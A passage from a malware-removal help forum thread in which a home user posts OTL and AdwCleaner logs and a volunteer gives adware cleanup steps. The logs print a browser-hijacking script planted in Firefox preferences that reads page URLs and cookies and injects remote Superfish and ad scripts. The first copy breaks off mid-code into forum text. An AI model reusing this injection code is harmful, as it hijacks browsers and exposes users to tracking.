MOD - [2010/07/07 22:26:07 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Runtime.Shared.Private\2.0.3428.28316__90ba9c70f846762e\CLI.Caste.Graphics.Runtime.Shared.Private.dll
MOD - [2010/07/07 22:26:06 | 000,061,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\APM.Server\2.0.3497.38811__90ba9c70f846762e\APM.Server.dll
MOD - [2010/07/07 22:26:06 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Server\2.0.3497.38810__90ba9c70f846762e\AEM.Server.dll
MOD - [2010/07/07 22:26:06 | 000,032,768 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\ATICCCom\2.0.0.0__90ba9c70f846762e\ATICCCom.dll
MOD - [2010/07/07 22:26:06 | 000,019,456 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CCC.Implementation\2.0.3497.38893__90ba9c70f846762e\CCC.Implementation.dll
MOD - [2009/09/17 14:36:34 | 000,079,192 | ---- | M] () -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
MOD - [2009/07/25 10:07:12 | 000,058,704 | ---- | M] () -- C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
MOD - [2009/07/16 14:27:48 | 000,052,536 | ---- | M] () -- C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
MOD - [2009/07/16 14:27:44 | 007,263,544 | ---- | M] () -- C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
MOD - [2009/06/22 14:38:40 | 000,015,160 | ---- | M] () -- C:\Program Files\TOSHIBA\TOSHIBA Assist\NotifyX.dll
MOD - [2009/05/04 09:45:14 | 000,016,384 | R--- | M] () -- C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
MOD - [2009/03/12 18:08:04 | 000,049,152 | ---- | M] () -- C:\Program Files\TOSHIBA\PCDiag\NotifyPCD.dll


========== Services (SafeList) ==========

SRV - [2014/11/07 18:57:56 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/09/24 21:04:40 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/09/12 01:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/09/11 21:09:49 | 000,255,040 | ---- | M] (WildTangent) [On_Demand | Stopped] -- C:\Program Files\WildTangent Games\App\GamesAppIntegrationService.exe -- (GamesAppIntegrationService)
SRV - [2014/08/22 11:44:44 | 000,022,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2014/08/22 11:44:40 | 000,288,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2014/05/17 12:52:30 | 000,203,344 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
SRV - [2014/04/20 16:15:58 | 000,233,552 | ---- | M] (Kaspersky Lab ZAO) [Auto | Running] -- C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avp.exe -- (AVP15.0.0)
SRV - [2012/11/20 07:36:01 | 000,042,504 | ---- | M] () [Auto | Stopped] -- C:\Program Files\TelevisionFanatic\bar\1.bin\64barsvc.exe -- (TelevisionFanaticService)
SRV - [2011/02/11 12:45:52 | 000,054,136 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe -- (TMachInfo)
SRV - [2010/12/27 19:53:06 | 001,343,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\Wat\WatAdminSvc.exe -- (WatAdminSvc)
SRV - [2009/09/17 14:37:18 | 000,111,960 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe -- (TOSHIBA HDD SSD Alert Service)
SRV - [2009/08/10 18:55:46 | 000,185,712 | ---- | M] (TOSHIBA CORPORATION) [Auto | Running] -- C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe -- (cfWiMAXService)
SRV - [2009/08/05 13:18:50 | 000,464,224 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe -- (TosCoSrv)
SRV - [2009/07/29 22:54:10 | 000,176,128 | ---- | M] (AMD) [Auto | Running] -- C:\Windows\System32\atiesrxx.exe -- (AMD External Events Utility)
SRV - [2009/07/28 14:43:04 | 000,128,344 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Windows\System32\TODDSrv.exe -- (TODDSrv)
SRV - [2009/07/13 17:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)
SRV - [2009/07/13 17:15:41 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2009/03/10 17:51:20 | 000,046,448 | ---- | M] (TOSHIBA CORPORATION) [Auto | Running] -- C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe -- (ConfigFree Service)


========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\RtsUCcid.sys -- (USBCCID)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Rts516xIR.sys -- (RtsUIR)
DRV - [2014/11/09 17:08:44 | 000,644,808 | ---- | M] (Kaspersky Lab ZAO) [File_System | System | Running] -- C:\Windows\System32\drivers\klif.sys -- (KLIF)
DRV - [2014/11/09 17:08:44 | 000,112,136 | ---- | M] (Kaspersky Lab ZAO) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\klflt.sys -- (klflt)
DRV - [2014/11/09 16:52:34 | 000,039,464 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{F6AFC9AA-01D3-4483-9587-9FC470411F45}\MpKslc33e50aa.sys -- (MpKslc33e50aa)
DRV - [2014/11/09 11:28:49 | 000,114,904 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)
DRV - [2014/07/17 17:05:08 | 000,095,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NisDrvWFP.sys -- (NisDrv)
DRV - [2014/04/10 17:25:32 | 000,034,400 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\klhk.sys -- (klhk)
DRV - [2014/03/28 17:51:02 | 000,024,672 | ---- | M] (Kaspersky Lab ZAO) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\klkbdflt.sys -- (klkbdflt)
DRV - [2014/03/26 17:05:26 | 000,145,888 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\kneps.sys -- (kneps)
DRV - [2014/03/25 16:26:04 | 000,045,024 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\kltdi.sys -- (kltdi)
DRV - [2014/02/25 13:09:02 | 000,025,696 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\klim6.sys -- (KLIM6)
DRV - [2014/02/20 12:59:02 | 000,135,264 | ---- | M] (Kaspersky Lab ZAO) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\kl1.sys -- (kl1)
DRV - [2013/08/08 17:10:58 | 000,025,696 | ---- | M] (Kaspersky Lab ZAO) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\klmouflt.sys -- (klmouflt)
DRV - [2013/04/12 15:34:48 | 000,014,432 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\klpd.sys -- (klpd)
DRV - [2009/07/30 16:45:56 | 000,022,912 | ---- | M] (TOSHIBA Corporation.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\tdcmdpst.sys -- (tdcmdpst)
DRV - [2009/07/30 16:45:22 | 000,171,520 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV - [2009/07/30 11:06:30 | 004,994,560 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)
DRV - [2009/07/14 14:28:42 | 000,023,512 | ---- | M] (TOSHIBA Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\TVALZ_O.SYS -- (TVALZ)
DRV - [2009/07/13 15:51:11 | 000,034,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)
DRV - [2009/07/13 14:13:48 | 001,035,776 | ---- | M] (LSI Corp) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2009/07/02 13:55:36 | 000,036,208 | ---- | M] (COMPAL ELECTRONIC INC.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\LPCFilter.sys -- (LPCFilter)
DRV - [2009/05/04 23:30:28 | 000,014,392 | ---- | M] (Advanced Micro Devices Inc.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\AtiPcie.sys -- (AtiPcie)
DRV - [2008/08/22 09:28:32 | 000,333,824 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\RTL8187Se.sys -- (RTL8187Se)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\..\SearchScopes,DefaultScope = {B13C4182-9A7F-4F29-B480-F668606BC906}
IE - HKLM\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.google.co...ng}&rlz=1I7TSNA
IE - HKLM\..\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}: "URL" = http://search.mywebs...r={searchTerms}
IE - HKLM\..\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}: "URL" = http://astromenda.co...r=582993201&ir=

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.70searchengines.com/?op [Binary data over 200 bytes]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://home.mywebsea...CFYF7Qgod_RIAQg
IE - HKCU\..\URLSearchHook: {0696f815-a3a9-490a-bb14-9ec3350b1276} - No CLSID value found
IE - HKCU\..\SearchScopes,DefaultScope = {B13C4182-9A7F-4F29-B480-F668606BC906}
IE - HKCU\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.google.co...TSNA_en___US411
IE - HKCU\..\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}: "URL" = http://search.mywebs...r={searchTerms}
IE - HKCU\..\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}: "URL" = http://www.google.co...TSNA_en___US411
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..extensions.HElMs8NivVoSsx0S.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"Jerusalem.com\")>-1||url.indexOf(\"Vatican.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"http://sporty-glow.com/\")>-1||url.indexOf(\"http://game-trek.net/\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//www.superfish.com/ws/sf_main.jsp?dlsource=cbsfastsave&userId=1082116901308835839&CTID=p1&partnername=couponpeak\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){var stngs = {attr_name:'s17137475778365433519',szy_domain:[\"reportservingscore.info\",\"scoringserving.net\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13],[125,125,14],[234,60,15],[200,200,16],[336,280,17],[180,150,18],[120,60,19],[800,440,20],[800,600,21]],checkif:function(ifr){return (ifr.getAttribute('s17137475778365433519') || ifr.src.indexOf('=506761')>-1||ifr.src.indexOf('=511181')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"1\",eid:\"682\",hid:\"17137475778365433519\",lt:\"1\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"5wVbM0aE\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);\nreturn a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if©for(var b=0,d=c.length;b
  • 0

Advertisements


#2
crooleeck

crooleeck

    Member

  • Member
  • PipPipPip
  • 882 posts

Hi silver moma and welcome at GeekstoGo!

I'm crooleeck and I'll try to help you. But first please notice that I'm not limitless, I'm not familiar with all software, I don't know everything. However, it has taken me years to learn what I know. I would be glad to help you.

Fight against malware is NOT instantaneous, most infections require several courses of action to completely eradicate. It's also time-consuming, so be patient! We all like to know final result, so if you have since resolved the issues you were originally experiencing, or have received help elsewhere, please post.

I haven't finish my training so please be patient with me.

Note:

  • Please watch this topic. Part of the fix may require you to being Safe Mode, which will not allow you to access the internet, or my instructions! Please save or print following instrucions.
  • Do exactly - step by step - what I wish for. Don't be afraid! If there's anything you don't understand, stop and ask!
  • Please don't run unsupervised tools or fix on your own without my direction - it can be dangerous.
  • You must reply within 3 days or your topic will be closed

Step 1:
Download AdwCleaner to your desktop.

  • run AdwCleaner accept license and select Scan
  • On completion of the scan please click on Log button. Log will be showed, please copy content and post in next replay
  • Close AdwCleaner

Step 2:
aswMBR:

  • Download aswMBR to your desktop.
  • Double click the aswMBR.exe to run it.
  • Agreed to update.
  • Click the Scan button to start scan.

    aswMBR1.png
  • Confirm popup.
  • On completion of the fix click Save log, save it to your desktop as mbrfix.txt and post in your next reply.

    aswMBR2.png
  • On completion of the scan click Save log, save it to your desktop and post in your next reply

Looks like this is only a part of OTL log, please look for OTL.Txt and Extras.Txt. These are saved in the same location as OTL.

Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and paste them into your reply.
 

  • 0

#3
mulligabuck

mulligabuck

    Member

  • Topic Starter
  • Member
  • PipPip
  • 62 posts
Hi crooleeck. I'm not silver moma, but I'm pretty sure your response was intended for me since I'm the bonehead who pasted only part of an OTL log. Thanks for your help!
 
I've attached below the log from adwcleaner, mbrfix.txt, OTL.txt, and extras.txt.
 
# AdwCleaner v4.101 - Report created 10/11/2014 at 10:26:01
# Updated 09/11/2014 by Xplode
# Database : 2014-11-07.1 [Live]
# Operating System : Windows 7 Home Premium  (32 bits)
# Username : Mom - MOM-PC
# Running from : C:\Users\Mom\Desktop\adwcleaner_4.101.exe
# Option : Scan
 
***** [ Services ] *****
 
Service Found : TelevisionFanaticService
 
***** [ Files / Folders ] *****
 
File Found : C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage
File Found : C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage-journal
File Found : C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\searchplugins\astromenda.xml
File Found : C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\user.js
File Found : C:\Users\Mom\Desktop\Uninstall.exe
Folder Found : C:\Program Files\DealsFinderPro
Folder Found : C:\Program Files\TelevisionFanatic
Folder Found : C:\ProgramData\2308189059
Folder Found : C:\ProgramData\5ace784aaccbed8e
Folder Found : C:\ProgramData\DealsFinderPro
Folder Found : C:\ProgramData\Partner
Folder Found : C:\ProgramData\SaveItCoupons
Folder Found : C:\ProgramData\Trymedia
Folder Found : C:\Users\Mom\AppData\Local\iac
Folder Found : C:\Users\Mom\AppData\Local\TelevisionFanatic
Folder Found : C:\Users\Mom\AppData\LocalLow\TelevisionFanatic
Folder Found : C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\Extensions\[email protected]
Folder Found : C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default\Extensions\[email protected]
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Found : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKCU\Software\AppDataLow\Software\adawarebp
Key Found : HKCU\Software\AppDataLow\Software\TelevisionFanatic
Key Found : HKCU\Software\Google\Chrome\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae
Key Found : HKCU\Software\InstallCore
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5D79F641-C168-40DF-A32F-BACEA7509E75}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C98D5B61-B0EA-4D48-9839-1079D352D880}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{04D2B915-19FF-41E9-994D-95DC898BEA43}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5D79F641-C168-40DF-A32F-BACEA7509E75}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C98D5B61-B0EA-4D48-9839-1079D352D880}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}
Key Found : HKCU\Software\TelevisionFanatic
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{04D2B915-19FF-41E9-994D-95DC898BEA43}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{13119113-0854-469D-807A-171568457991}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{33119133-0854-469D-807A-171568457991}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{5D79F641-C168-40DF-A32F-BACEA7509E75}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{C98D5B61-B0EA-4D48-9839-1079D352D880}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F02C0832-C85C-4B93-8C6F-9DF20121A10D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{03119103-0854-469D-807A-171568457991}
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5D79F641-C168-40DF-A32F-BACEA7509E75}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{04D2B915-19FF-41E9-994D-95DC898BEA43}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F02C0832-C85C-4B93-8C6F-9DF20121A10D}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{779D1843-0043-65D2-D781-8614F17B6222}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TelevisionFanaticbar Uninstall
Key Found : HKLM\SOFTWARE\TelevisionFanatic
Key Found : HKLM\SOFTWARE\Trymedia Systems
Value Found : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{C98D5B61-B0EA-4D48-9839-1079D352D880}]
Value Found : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{0696F815-A3A9-490A-BB14-9EC3350B1276}]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{C98D5B61-B0EA-4D48-9839-1079D352D880}]
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [TelevisionFanatic Browser Plugin Loader]
Value Found : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]]
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16476
 
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxp://home.mywebsearch.com/index.jhtml?n=77DE8857&p2=^XP^xdm044^S03637^us&ptb=CC1B57FD-487C-478C-BD9B-EB527B05CB0F&si=CNr779vv3bMCFYF7Qgod_RIAQg
 
-\\ Mozilla Firefox v33.0.3 (x86 en-US)
 
[xdxtk8zr.default] - Line Found : user_pref("extensions.HElMs8NivVoSsx0S.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\[...]
 
-\\ Google Chrome v38.0.2125.111
 
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_45_ff&cd=2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDtDyCtCzzzytAyC0F0DtN0D0Tzu0StCtDyEtBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StB0C0DyD0AyEyByCtG0CtCyDzytGzyyC0AzztGzy0A0EyEtGtC0Ezy0ByBzyzy0C0EzyyEtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0E0FtB0AtAtC0DtG0B0C0A0EtGyEzz0C0DtG0Azz0DtDtGyB0BtDtDzytD0CyC0EyE0C0D2Q&cr=582993201&ir=
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\preferences] - Found [Extension] : pfkfdlcdbajamklbneflfbcmfgddmpae
